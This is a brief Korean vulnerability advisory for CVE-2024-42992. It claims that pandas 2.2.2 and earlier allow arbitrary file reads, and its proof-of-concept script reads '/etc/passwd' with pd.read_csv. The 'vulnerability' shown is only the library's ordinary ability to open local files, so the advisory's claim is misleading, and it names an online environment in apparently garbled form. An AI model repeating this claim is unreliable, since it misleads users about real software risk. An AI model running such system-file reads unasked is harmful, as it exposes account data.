
CVE-2024-42992
Python Pip Pandas v2.2.2에 임의 파일이 포함된 것으로 발견되었습니다.
Pip Pandas(모든 버전) -<=2.2.2
'pandas' 라이브러리에는 임의 파일 읽기 취약점이 존재하며, 공격자는 이 취약점을 이용해 파일 시스템에 있는 모든 파일을 무제한으로 읽을 수 있습니다. 이 취약점은 '/etc/passwd'와 같은 민감한 파일에 대한 무단 액세스를 허용합니다.
pandas 라이브러리는 다양한 파일 형식에서 데이터를 읽는 기능을 포함하여 강력한 데이터 조작 기능을 제공합니다. 그러나 입력으로 제공되는 파일 경로에 대한 충분한 제한이 없어 악의적인 사용자가 임의의 파일을 지정하고 읽을 수 있습니다. 다음 코드 조각으로 이 취약점을 시연할 수 있습니다:
import pandas as pd
# Attempt to read the /etc/passwd file
try:
# Use pandas to read the file, specifying the colon as a separator
df = pd.read_csv('/etc/passwd', sep=':', header=None)
print(df)
except Exception as e:
print("Error occurred while reading the file:", e)
이 코드는 Unix 기반 시스템에서 사용자 계정 정보가 포함된 중요한 파일인 '/etc/passwd' 파일을 읽으려고 시도합니다. 코드가 성공적으로 실행되면 이 민감한 파일의 내용을 출력합니다.
특정 온라인 또는 로컬 액세스 시나리오에서는 이 문제를 성공적으로 재현할 수 있습니다. replyt.com과 같은 일부 온라인 환경에서는 특히 재현 가능성이 높습니다.
python CVE-2024-42992.py
